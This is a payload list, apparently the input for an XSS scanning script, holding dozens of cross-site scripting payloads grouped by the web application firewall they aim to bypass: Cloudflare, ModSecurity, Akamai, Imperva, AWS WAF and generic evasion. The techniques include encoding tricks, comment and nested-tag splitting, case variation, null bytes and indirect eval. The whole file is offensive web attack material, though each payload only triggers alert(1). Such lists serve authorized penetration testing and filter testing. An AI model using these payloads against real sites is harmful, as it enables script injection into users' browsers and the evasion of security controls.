# WAF Bypass XSS Payloads
# Use with: python bugme.py -u "URL" --payloads payloads/waf-bypass.txt

# ========================================
# CLOUDFLARE BYPASS
# ========================================
<svg/onload=alert(1)>
<iframe/onload=alert(1)>
<details/open/ontoggle=alert(1)>
<img/src=x/onerror=alert(1)>
<svg><script>alert(1)</script></svg>

# ========================================
# MODSECURITY BYPASS
# ========================================
<img src=x onerror=alert`1`>
<svg onload=alert`1`>
<img src=x onerror=alert\u0028 1\u0029>
<img src=x onerror=\u0061lert(1)>
<img src=x onerror=eval('\x61lert(1)')>

# ========================================
# AKAMAI BYPASS
# ========================================
<img src=x:alert(1) onerror=alert(1)>
<svg><script>alert(1)</script></svg>
<img src=x onerror=alert(1) style=x:expression(alert(1))>

# ========================================
# IMPERVA BYPASS
# ========================================
<svg><script>alert(1)</script></svg>
<math><mtext><script>alert(1)</script></mtext></math>
<svg><foreignobject><script>alert(1)</script></foreignobject></svg>

# ========================================
# AWS WAF BYPASS
# ========================================
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<details open ontoggle=alert(1)>

# ========================================
# GENERIC WAF BYPASS
# ========================================

# Unicode encoding
<img src=x onerror=\u0061lert(1)>
<img src=x onerror=\u0061\u006c\u0065\u0072\u0074(1)>

# Hex encoding
<img src=x onerror=\x61lert(1)>
<img src=x onerror=\x61\x6c\x65\x72\x74(1)>

# Octal encoding
<img src=x onerror=\141\154\145\162\164(1)>

# Base64 encoding
<img src=x onerror=eval(atob('YWxlcnQoMSk='))>
<script>eval(atob('YWxlcnQoMSk='))</script>

# String concatenation
<script>alert(1+''+'')</script>
<script>alert('X'+'S'+'S')</script>

# Character code
<script>alert(String.fromCharCode(88,83,83))</script>
<img src=x onerror=alert(String.fromCharCode(88,83,83))>

# Comment injection
<img src=x one/**/rror=alert(1)>
<scr<!---->ipt>alert(1)</scr<!---->ipt>

# Nested tags
<<script>script>alert(1)<</script>/script>
<scr<script>ipt>alert(1)</scr</script>ipt>

# Case variation
<ScRiPt>alert(1)</ScRiPt>
<IMG SRC=x ONERROR=alert(1)>
<SvG oNlOaD=alert(1)>

# Null byte
<script\x00>alert(1)</script>
<img\x00src=x onerror=alert(1)>

# Tab/newline
<img	src=x	onerror=alert(1)>
<img
src=x
onerror=alert(1)>

# No space
<img/src=x/onerror=alert(1)>
<svg/onload=alert(1)>

# Using backticks
<img src=x onerror=alert`1`>
<svg onload=alert`1`>

# Template strings
<script>`${alert(1)}`</script>

# Indirect eval
<script>(1,eval)('alert(1)')</script>
<script>setTimeout('alert(1)',0)</script>

# Function constructor
<script>Function('alert(1)')()</script>
<script>[].constructor.constructor('alert(1)')()</script>
